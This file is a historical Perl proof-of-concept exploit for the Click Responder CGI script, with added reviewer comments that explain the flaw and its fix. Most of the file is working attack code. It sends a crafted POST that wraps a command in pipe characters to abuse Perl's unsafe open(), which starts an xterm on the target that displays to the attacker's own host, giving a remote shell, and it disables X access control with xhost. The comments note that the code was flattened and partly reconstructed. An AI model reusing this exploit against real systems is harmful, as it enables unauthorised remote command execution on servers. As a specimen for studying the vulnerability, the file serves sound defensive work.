#!/usr/bin/perl -w
## Click Responder v1.02 exploit, by Luke and Mark Pfeifer.
## Just a old and free cgi-script which is vulnerable to the
## pesky pipe! ;) After writing my first exploit, this goes
## fast - I just have to change a few fields!
##
## - teleh0r@doglover.com / anno 2000 -
## http://teleh0r.cjb.net
#
# Reviewer notes (defensive reading of this historical proof-of-concept):
#
# The "pesky pipe" the header refers to is the classic Perl two-argument
# open() pattern: when a user-supplied string is passed as the single
# filename argument, a leading or trailing "|" makes Perl treat it as a
# shell command instead of a file name.  The form field "mestxt" below is
# sent as %7C...%7C, i.e. a value wrapped in "|" characters, which is
# exactly the input shape that pattern fails on.  The fix on the server
# side is the three-argument open (open my $fh, '<', $name), plus
# rejecting or escaping shell metacharacters in anything that reaches a
# filesystem or process call.  The script was flattened onto a single
# line at some point (shebang, comments and code were all fused), so the
# line breaks below are reconstructed; tokens are left as found.

use strict;
use Socket;

# Three positional arguments are expected.  The usage string prints only
# "$0" followed by a space; the argument names were probably written as
# <...> placeholders and stripped by whatever extracted this page.
if (@ARGV < 3) {
    print("Usage: $0 \n");
    exit(1);
}

my($target,$attacker,$dpy,$length,$command,
   $agent,$sploit,$iaddr,$paddr,$proto);
($target,$attacker,$dpy) = @ARGV;

# NOTE(review): this only checks that $dpy contains at least one digit;
# it is not a "must be a number" check as the message claims.
if ($dpy !~ /\d/) {
    print("dpy must be a number, probably 0\n");
    exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/clickresponder.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

# NOTE(review): xhost is run through the shell with an interpolated
# argument (list-form system() would avoid the shell).  Also, "+" and
# the host name are passed as two separate arguments; per xhost(1) a
# bare "+" disables X access control entirely, so the operator's own
# display is exposed to every host until the matching "xhost -" below
# runs (and it never runs if one of the die() calls fires first) - confirm
# against the local xhost implementation.
system("xhost + $target");

# Content-Length for the POST body.  87 corresponds to the fixed part of
# $command (everything except $attacker and $dpy, 85 characters) plus the
# "\015\012" that send() appends below (2 characters) - so the constant
# is tied to both literals and silently breaks if either is edited.
$length = 87 + length($attacker.$dpy);

# URL-encoded form body.  %7C is "|": the command is wrapped in pipe
# characters so that the CGI's unsafe open() interprets it as a pipe.
$command = "go_to=&mestxt=%7Cxterm+-ut+-display+$attacker%3A$dpy%7C&subject".
           "=subject+here&send_to=hass\@hass.com";

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;)

# NOTE(review): HTTP headers are line-separated, but this literal arrived
# with single spaces between them (almost certainly the same flattening
# that hit the rest of the file).  It is left exactly as found.
$sploit= "POST /cgi-bin/clickresponder.pl HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $command";

# NOTE(review): inet_aton() failing on an unresolvable name does not set
# $!, so the die() message here carries no useful diagnostic.
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

# Bareword global filehandle (SOCKET); a lexical handle is the modern
# form.  No response is ever read: the script fires the request, waits
# three seconds and reports success unconditionally.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");   # send() returns bytes sent
close(SOCKET);

sleep(3);

# Re-enable X access control / drop the host added above (see note on
# the earlier xhost call).
system("xhost - $target");

print("\nAll done - hopefully you got the flying xterm!\n");
exit(0);

# www.hack.co.za [26 July 2000]#